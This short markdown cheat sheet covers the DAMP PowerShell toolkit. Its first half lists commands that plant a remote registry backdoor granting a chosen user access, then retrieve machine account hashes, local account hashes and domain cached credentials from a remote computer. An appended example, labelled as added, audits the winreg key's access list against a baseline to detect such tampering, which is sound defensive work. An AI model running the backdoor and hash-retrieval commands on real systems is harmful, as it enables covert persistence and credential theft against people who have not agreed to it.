
# SecurityDescriptor - Remote Registry

Load the DAMP toolkit scripts by dot-sourcing them:

```
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval
```

**Using DAMP with admin privileges on the remote machine**

```
Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose
```

**Retrieve machine account hash from local machine**

```
Get-RemoteMachineAccountHash -Computername <computername> -Verbose
```

**Retrieve local account hash from local machine**

```
Get-RemoteLocalAccountHash -Computername <computername> -Verbose
```

**Retrieve domain cached credentials from local machine**

```
Get-RemoteCachedCredential -Computername <computername> -Verbose
```
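
A defender-side check for this technique, as an added example that is not part of the original notes or of the DAMP toolkit: it lists allow ACEs on the `winreg` key, whose security descriptor Windows consults for remote registry connections, that fall outside an assumed baseline. The function name `Get-UnexpectedRegistryAce` and the baseline trustee list are assumptions; compare against a known-good host before treating a result as a finding.

```powershell
# Added example (not from the page or from DAMP): audit the DACL of the key
# that gates remote registry access and report trustees outside a baseline.

# Windows uses the ACL on this key to decide who may connect to the registry remotely.
$WinregKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'

# Assumed baseline of expected trustees; adjust to match a known-good build.
$BaselineTrustees = @(
    'BUILTIN\Administrators',
    'BUILTIN\Backup Operators',
    'NT AUTHORITY\LOCAL SERVICE',
    'NT AUTHORITY\SYSTEM',
    'CREATOR OWNER'
)

function Get-UnexpectedRegistryAce {
    param(
        [string[]]$Path    = @($WinregKey),
        [string[]]$Allowed = $BaselineTrustees
    )
    foreach ($key in $Path) {
        if (-not (Test-Path -Path $key)) {
            Write-Warning "Key not found: $key"
            continue
        }
        $acl = Get-Acl -Path $key
        foreach ($ace in $acl.Access) {
            $trustee = $ace.IdentityReference.Value
            # Only allow ACEs grant access; skip trustees that are in the baseline.
            if ($ace.AccessControlType -eq 'Allow' -and $Allowed -notcontains $trustee) {
                [pscustomobject]@{
                    Key       = $key
                    Owner     = $acl.Owner
                    Trustee   = $trustee
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Run elevated on the host being reviewed; any row returned deserves a closer look.
Get-UnexpectedRegistryAce | Format-Table -AutoSize
```

An explicit (non-inherited) ACE for an ordinary user or unexpected group on this key is the main thing to look for.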
